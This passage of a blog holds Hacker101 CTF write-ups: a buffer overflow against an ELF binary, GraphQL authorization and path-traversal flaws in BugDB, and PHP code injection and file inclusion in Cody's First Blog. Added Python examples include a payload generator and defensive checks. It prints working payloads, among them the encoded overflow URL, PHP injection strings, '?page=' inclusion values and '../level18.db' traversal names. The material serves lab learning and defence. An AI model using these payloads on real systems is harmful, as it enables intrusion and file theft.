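    if len(data) < ELF64_HEADER_LE.size or data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if data[4] != 2:                       # EI_CLASS: 1 = ELF32, 2 = ELF64
        raise ValueError("only ELFCLASS64 is handled here")
    layout = ELF64_HEADER_LE if data[5] == 1 else ELF64_HEADER_BE   # EI_DATA: 1 = LSB
    (ident, e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, e_flags,
     e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx) = layout.unpack(data[:64])
    return {
        "class": "ELF64",
        "data": "little endian" if ident[5] == 1 else "big endian",
        "type": E_TYPES.get(e_type, hex(e_type)),
        "machine": "x86-64" if e_machine == 0x3E else hex(e_machine),
        "entry": e_entry, "phoff": e_phoff, "shoff": e_shoff, "flags": e_flags,
        "ehsize": e_ehsize, "phentsize": e_phentsize, "phnum": e_phnum,
        "shentsize": e_shentsize, "shnum": e_shnum, "shstrndx": e_shstrndx,
    }


def has_fixed_load_address(header):
    """ET_EXEC binaries are mapped at a fixed address, so a code address such as the
    one gdb reports for a function does not move between runs; ET_DYN (PIE) ones do."""
    return header["type"] == "EXEC"


# Constructed header carrying the field values readelf -h printed for `vulnerable`.
SAMPLE_HEADER = ELF64_HEADER_LE.pack(
    b"\x7fELF" + bytes([2, 1, 1, 0, 0]) + b"\x00" * 7,   # magic, class, data, version, OS/ABI, ABI ver, pad
    2, 0x3E, 1, 0x4005B0, 64, 6808, 0, 64, 56, 9, 64, 30, 29)

if __name__ == "__main__":
    hdr = parse_elf64_header(SAMPLE_HEADER)
    print(f"type={hdr['type']} machine={hdr['machine']} entry={hdr['entry']:#x} fixed={has_fixed_load_address(hdr)}")
```

Run against a real file with parse_elf64_header(open(path, "rb").read(64)); a PIE binary reports DYN here, and its addresses would have to be rebased at runtime.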

From here I went ahead to use ‘strings’ to print out the sequences of printable characters in the program.

# strings vulnerable
/lib64/ld-linux-x86-64.so.2
libc.so.6
exit
puts
stdin
printf
fgetc
memset
getenv
__libc_start_main
__gmon_start__
GLIBC_2.2.5
UH-X
AWAVA
AUATL
[]A\A]A^A_
FLAGS
What is your name?
Hello %s!
;*3$"

Based on the printable characters in the program, I can identify that ‘FLAGS’ is where the flag will be printed in the web application. Now we have to debug/reverse engineer the program called ‘vulnerable’.

I searched up reverse engineering of ELF executable files; it explained why the gdb tool is unable to read the symbols in the file and how to do basic reverse engineering for an ELF 64-bit LSB executable.

Moving on…

In the code block above, the command ‘readelf -h vulnerable’ gives us the entry point of the executable file. The entry point is ‘0x4005b0’, which is the starting memory address for the executable file.

Time to debug the program…

I ran ‘gdb vulnerable’ to get a debugging session shell.

Do note that the file is 64-bit, so once you disassemble main or x it, you will see ‘rbp’, ‘rsp’ etc.

Afterwards, I ran ‘x/200i 0x4005b0’.

Basically, what I did was to display 200 instructions of memory contents at that address.

Hit the enter button a few times and discover that there is a function called ‘print_flags’. The memory address that prints out the flag in the web application is ‘0x4006ee’; the full address is ‘0x00000000004006ee’. Keep in mind the memory address of ‘print_flags’.

Looking through the contents, I figured out that fgetc() in the program accepts the stdin of the user, which goes to the main function where printf() prints out the user’s input.

Seeing fgetc() and printf(), I finally understood that I need to do a buffer overflow attack on the program to point the return address to the memory address of ‘print_flags’ to print out the flag.

Before exploiting the buffer, I needed to find out the buffer size of the program. So I typed ‘disassemble main’ to find the buffer. ‘$0x20’ is a hexadecimal value; converted to decimal, the buffer is 32 bytes.

The stack = buffer[32] + rbp(8) + return address(8) = 48. Why add 8 bytes for rbp and the return address? Because the program is 64-bit instead of 32-bit, so each of these slots is 8 bytes.

For the memory address of ‘print_flags’ to become the return address, I need to overflow the first 40 bytes with ‘A’, which in hex is ‘\x41’.

In the web application, instead of inputting the characters and memory address in the form, I input them in the URL bar using URL encoding, because if I used ASCII characters in the input box I wouldn’t be able to input the memory address of ‘print_flags’, as the hexadecimal value converts to non-ASCII characters.

In the URL bar it should look like this:

/?stdin=%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%41%ee%06%40%00%00%00%00%00
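The query string above is the stack layout from the previous paragraphs written out by hand: 32 bytes of buffer, 8 bytes of saved rbp, then the 8-byte address in little-endian order, every byte percent-encoded so that the NUL and high bytes survive the URL. The following is an added example, not the author's script, that derives the same string from those three facts instead of typing it; the constants are the values the write-up found, and the function names are my own.

```python
import struct

BUFFER_SIZE = 32              # sub $0x20,%rsp in `disassemble main`
SAVED_RBP_SIZE = 8            # 64-bit frame: the saved rbp occupies one 8-byte slot
PRINT_FLAGS_ADDR = 0x4006EE   # address of print_flags as shown by gdb


def padding_length(buffer_size=BUFFER_SIZE, saved_rbp=SAVED_RBP_SIZE):
    """Bytes between the start of the buffer and the saved return address."""
    return buffer_size + saved_rbp


def build_stdin_payload(target=PRINT_FLAGS_ADDR, filler=b"A"):
    """Filler up to the return slot, then the target address as a little-endian 8-byte value."""
    return filler * padding_length() + struct.pack("<Q", target)


def percent_encode(payload):
    """Encode every byte as %xx; the NUL bytes of the address cannot be typed into the form."""
    return "".join(f"%{b:02x}" for b in payload)


def stdin_query(payload):
    """The query string the write-up pastes into the address bar."""
    return "/?stdin=" + percent_encode(payload)


if __name__ == "__main__":
    print(stdin_query(build_stdin_payload()))
```

Two properties of the binary make a constant like 0x4006ee usable at all: readelf reported Type EXEC, so the code is not position-independent and print_flags sits at the same address on every run, and the overflow reaches the return slot without aborting, which a stack protector would prevent. Building the same program with -fstack-protector and as a PIE would break this payload even though the fgetc loop itself is unchanged.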

I hit the enter button and I was able to get the flag.

What did I learn? How to reverse engineer the program and analyse its contents to figure out that it is vulnerable to a buffer overflow attack, where the main objective is to have the return address point to the memory address of the function ‘print_flags’ to output the flag in the web application.

That’s all folks 🙂

Author: Derek

Hacker101 – BugDB v3

We have now arrived at the last version of BugDB, version 3. If you are reading this post/stage, you should have a bit of understanding of how the queries work and how to explore the schema in the GraphiQL client in the browser.

Leggo!!!! BugDBv3!!!!

The given hint is “What new functionality was added?”. This brought me to look at the documentation in the GraphiQL client. Under the object type ‘mutation’, there are 2 field types, ‘attachFile’ and ‘modifyAttachment’. These are the new functions added to the client.

I queried the object type ‘allUsers’ to identify what results I would receive, and the result showed me that the subfield ‘attachments’ is blank, giving me the hint that I will have to do a mutation in order to see the flag in ‘attachments’.

However, once I attached the file and queried again, all I saw was the unique filename.

Once I reached this point, I went to look for more hints.

The hints are:

  • What new functionality was added?
  • Filenames are always interesting
  • How do you access attachments? Hint: not via GraphQL

Based on the last hint, I figured out that ‘attachments’ could be a folder, so I added ‘/attachments/’ to the URL. I got the error message ‘Not Found’, so I was thinking that since ‘attachments’ is just a folder, there should be files in it.

I tried pasting the filename in the URL but still got an error message; then I tried the id attached to the filename and it worked. I can conclude that the filename is bound to the ‘id’ in the field ‘attachFile’.

After that I was stuck and totally clueless, so due to my lack of knowledge and skills I searched online and found 2 useful resources that helped me understand this CTF.

Here are the 2 links:

I really was stuck and couldn’t move on, so, to summarise the resources I found: I can do a directory traversal and go to the file called ‘main.py’.

Based on the resources, I used the other mutation available which is ‘modifyAttachment’ to change the filename to “../main.py”.
modify

I went to “/attachments/1” and it returned a web page; I viewed the source code, and here are the lines of code.
[Screenshot: main_py]

Afterwards, I watched the YouTube video, and a person in the Discord chat said that not all of the imported files are Python packages; some of them are source files, and the one that stood out is ‘model’.

I modified the filename to “../model.py”.
[Screenshot: model_py]

The result was a page full of code, and I viewed the source code.
[Screenshot: model_code]

In model.py it imports the db_session, and in line 7 of the source code the ‘engine’ variable is bound to the db_session.
[Screenshot: level18]
It shows ‘level18.db’, which means that we have to open up level18.db, where the flag is.

I modified the filename to ‘../level18.db’ and reloaded the web page, and the flag was there.
[Screenshot: flag3]
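The traversal above works because the attachment handler trusts whatever filename the mutation stored. As an added example (not the challenge's own code), here is a Python resolver that rejects such names both when the rename is accepted and when the path is resolved for download; the ATTACHMENTS table and the paths are constructed.

```python
"""Added example, not the challenge's own code: serving stored attachments by
id without letting a renamed file escape the attachments directory.

In the BugDBv3 write-up, modifyAttachment renames an attachment to
"../main.py" and /attachments/1 then serves a source file. The stored
filename has to be treated as untrusted twice: when the rename is accepted
and again when the path is resolved for download.
"""
import os

# Constructed stand-in for the attachments table (id -> stored filename).
ATTACHMENTS = {
    1: "report.txt",       # a normal upload
    2: "../main.py",       # renamed through the mutation, as in the write-up
    3: "/etc/hostname",    # absolute path smuggled into the filename
}


def vulnerable_path(base_dir, attachment_id):
    """Naive join: ".." walks out of base_dir and an absolute filename
    replaces base_dir entirely (os.path.join discards the prefix)."""
    return os.path.join(base_dir, ATTACHMENTS[attachment_id])


def accept_filename(name):
    """Check for modifyAttachment: allow exactly one plain path component,
    so a traversal name is never stored in the first place."""
    if not name or name in (".", ".."):
        return False
    return not any(ch in name for ch in ("/", "\\", "\x00"))


def safe_path(base_dir, attachment_id):
    """Resolve the stored filename and refuse anything outside base_dir.

    Returns the canonical absolute path, or None for an unknown id or a
    name that would escape the directory (defence in depth, in case a bad
    name was stored before accept_filename existed)."""
    name = ATTACHMENTS.get(attachment_id)
    if name is None:
        return None
    base = os.path.realpath(base_dir)
    # realpath collapses ".." and follows symlinks, so containment is
    # decided on the canonical location rather than on the raw string.
    target = os.path.realpath(os.path.join(base, name))
    if target == base or os.path.commonpath([base, target]) != base:
        return None
    return target
```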

DAMMM, I really struggled a lot, but thanks to the resources, the YouTube video and GitHub, I was able to solve it. Really so thankful right now.

Alright, that’s all, folks.

Author: Derek

Hacker101 – BugDB v2

Alright, let’s get started with BugDBv2. Similar to BugDBv1, it is on GraphiQL.

So for BugDBv2, there is an additional root type called ‘mutation’. You can find it under the tab button called ‘Docs’.
[Screenshot: explore_mut]
Click on ‘MyMutations’ and it will show you the field structure.
[Screenshot: modified_fields]

I searched for what ‘Mutation’ means in GraphiQL, and this is what it told me: mutation queries modify data in the data store and return a value. They can be used to insert, update, or delete data. Mutations are defined as a part of the schema.

So the field types under ‘MyMutation’ are fields that modify data. At this point, this was all I knew, and I was a bit clueless, so I went to get a hint. The first hint given to me was “What has changed since last version?”.

What has changed? In the previous BugDBv1, I was able to query the subfield called ‘bug’, whose subfield ‘text’ gave me the flag. So I queried the same thing for BugDBv2 and got an error message, which is…
[Screenshot: error]

Since I can’t query the field “bug”, the flag must be in there. I queried the object type ‘allBugs’ but found nothing.
[Screenshot: admin_bug]
I wondered why only the ‘admin’ bug was shown and not the ‘victim’ bug. I thought the field ‘private’ was preventing the ‘victim’ bug from being shown, so I changed it using ‘Mutation’ to modify the data in the database.

Taking a look again at the field ‘modifyBug’:
[Screenshot: modified_fields]
I have to change the field ‘private’ to ‘false’ for ‘victim’. Note that the ‘id’ field of ‘victim’ is ‘2’.
[Screenshot: mutation_victim]
For the rest of the fields, as I said in the previous post, you can leave it to the GraphiQL client interface, which lists the suggested field types for us.

And now I input the same query for the object type ‘allBugs’.
[Screenshot: allBugs]
The result returned to us has the flag in the subfield ‘text’ of ‘victim’.
[Screenshot: flag2]
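The mutation succeeds because nothing checks who owns bug 2. As an added example (not Hacker101's code), here is a toy Python resolver with that ownership check beside the unchecked one; the in-memory store and the rule for which bugs allBugs returns to whom are assumptions.

```python
"""Added example, not Hacker101's code: the ownership check that BugDBv2's
modifyBug mutation lacks.

In the write-up, an unrelated user sets private=false on victim's bug
(id 2) and then reads its text via allBugs. The store below is a constructed
model of that schema; which bugs allBugs returns to whom is an assumption
(public bugs to everyone, private bugs only to their reporter).
"""
import copy


class Forbidden(Exception):
    """Raised when the caller does not own the bug being modified."""


SEED_BUGS = {  # constructed sample rows: id -> bug record
    1: {"reporter": "admin", "private": False, "text": "admin's public bug"},
    2: {"reporter": "victim", "private": True, "text": "victim's secret"},
}


def make_store():
    """Fresh copy of the sample table so each scenario starts clean."""
    return copy.deepcopy(SEED_BUGS)


def all_bugs(store, viewer):
    """Model of the allBugs query: ids of the bugs `viewer` may see."""
    return sorted(bid for bid, bug in store.items()
                  if not bug["private"] or bug["reporter"] == viewer)


def modify_bug_vulnerable(store, bug_id, private):
    """Resolver as the challenge appears to behave: nobody asks who is calling."""
    store[bug_id]["private"] = private
    return True


def modify_bug(store, viewer, bug_id, private):
    """Hardened resolver: only the bug's reporter may change its visibility."""
    bug = store.get(bug_id)
    if bug is None or bug["reporter"] != viewer:
        # One error for "not found" and "not yours", so ids are not confirmed.
        raise Forbidden("bug %r is not modifiable by %r" % (bug_id, viewer))
    bug["private"] = private
    return True
```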

Yayy, we finally solved BugDBv2. Thank you for reading, and feel free to leave a comment.

Author: Derek

Hacker101 – Cody’s first blog

Today, I will be doing Cody’s First Blog from Hacker101. This challenge is at Moderate level and has 3 flags to be discovered.

Flag 0: Found

[Screenshot: home_cody]

From the information given, we know that the blog is written in PHP and that the PHP function include() is somewhat useful for us. Then, we have this comment box to submit comments.

So, the first thing I do after seeing an input box is try XSS injection:

<script>alert('1')</script>

Upon submitting, the input seems to have gone through, but no alert popped up.

[Screenshot: submit]

I conclude that maybe XSS does not work here. Since the blog is using PHP, why not try putting in some PHP tags to see whether it works or not.

<?php phpinfo()?>

[Screenshot: cody_f0]

That was easy! 😉😉👨🏼‍💻

Flag 1: Found

[Screenshot: underline_cody]

Viewing the page source, we can see that line 19 is commented out. It seems we can access the admin page through that URL ending.

[Screenshot: admin_cody]

What if we change the URL to this, will anything interesting happen?

?page=a

[Screenshot: un_cody]

As we can see, ‘a’ is used as a filename. So, for the first case, ‘admin.auth.inc’, the include function should look like this [What is file inclusion? https://www.w3schools.com/php/php_includes.asp]:

include(admin.auth.inc.php)

Therefore, we can conclude this: there are 3 files available, which are ‘admin’, ‘auth’ & ‘inc’. Basically, the developer thought of having all 3 files and including them to save time and energy. Have you ever played a jigsaw puzzle before? 🤗🤗 That is exactly what I am going to do.

?page=admin
?page=auth
?page=inc
?page=admin.auth
?page=admin.inc
?page=auth.inc

With the ‘admin.inc’ page, we have successfully got into the admin page without authenticating ourselves.

[Screenshot: cody_f1]

It seems like the ‘auth’ page handles the authentication of the admin. Once we remove the ‘auth’ page, we can bypass the authentication easily. Not easy but cool! 🤩🤩👨🏼‍💻

Flag 2: Found

Disclaimer: Due to my lack of knowledge and skills, I couldn’t complete this flag on my own. I try to put my understanding into this.

https://github.com/testerting/hacker101-ctf/tree/master/codys_first_blog/flag2

Hint given:

  • Read the first blog post carefully
  • We talk about this in the Hacker101 File Inclusion Bugs video
  • Where can you access your own stored data?
  • Include doesn’t just work for filenames

Back to the error in Flag 1: we missed some important information.

[Screenshot: id_cody]

[Screenshot: error]

A memory error is encountered: the memory is overloaded.

Let’s change the approach: what if we input a URL instead of a ‘filename’ to avoid overloading the memory?

include(index.php)
include(http://localhost/index)

For those who wonder why putting a URL in the include() function works: https://www.php.net/manual/en/function.include.php

?page=http://localhost/index

[Screenshot: idk]

The script we put in during Flag 0 is triggered!! 👨‍💻👨‍💻

Let’s try out a bit more:

<?php echo 'happy new year';?>

[Screenshot: more]

We can roughly conclude that we can run anything as long as we enclose it inside PHP tags. Since we know this, instead of accessing the file through the URL, why not print out the file instead?

<?php echo readfile("index.php")?>

After approving it in the admin page, look at the ‘index’ page again.

1502

“1502” is added!? Maybe we should check out the page source.

[Screenshot: cody_f2]

Found the last flag in the source code. 🏳️‍🌈🏳️‍🌈
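Seen from the defending side, each step above leaves a distinctive ?page= value in the web server access log. As an added example (not Cody's blog's code), here is a Python scanner over constructed log lines that flags those values; the allow-list of legitimate pages and the log lines themselves are assumptions.

```python
"""Added example, not Cody's blog's own code: spotting the include() abuse
from the write-up in web server access logs.

The blog builds its include() from the ?page= value plus a '.php' suffix (as
the write-up infers), so the log shows the probe 'a', the 'admin.inc' auth
bypass, the self-include via 'http://localhost/index' and, more generally,
traversal. ALLOWED_PAGES and the log lines are constructed assumptions.
"""
import re
from urllib.parse import parse_qs, urlsplit

ALLOWED_PAGES = {"index", "admin.auth.inc"}  # assumed legitimate values

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')

SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2020:10:00:01 +0000] "GET /?page=index HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2020:10:00:07 +0000] "GET /?page=a HTTP/1.1" 500 221
10.0.0.9 - - [01/Jan/2020:10:00:12 +0000] "GET /?page=admin.inc HTTP/1.1" 200 804
10.0.0.9 - - [01/Jan/2020:10:00:40 +0000] "GET /?page=http://localhost/index HTTP/1.1" 200 2310
10.0.0.9 - - [01/Jan/2020:10:01:02 +0000] "GET /?page=..%2F..%2Fconfig.php HTTP/1.1" 500 221
"""


def classify_page(value):
    """Label one ?page= value: 'ok', or why it must not reach include()."""
    if re.match(r"[a-z][a-z0-9+.-]*:", value, re.I) or value.startswith("//"):
        return "url-or-wrapper"   # http://... or any other stream scheme
    if ".." in value or value.startswith("/") or "\x00" in value:
        return "traversal"
    if value not in ALLOWED_PAGES:
        return "unlisted-page"    # e.g. 'a', or the 'admin.inc' bypass
    return "ok"


def scan_log(text):
    """Return (ip, page value, label) for each request whose ?page= value
    is anything other than an allow-listed page."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        params = parse_qs(urlsplit(m.group("target")).query)
        for value in params.get("page", []):   # parse_qs URL-decodes %2F
            label = classify_page(value)
            if label != "ok":
                findings.append((m.group("ip"), value, label))
    return findings
```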

Anyways, Happy New Year!!! 🎉🎉 Wishing you more bugs in the new year 🦗🐜
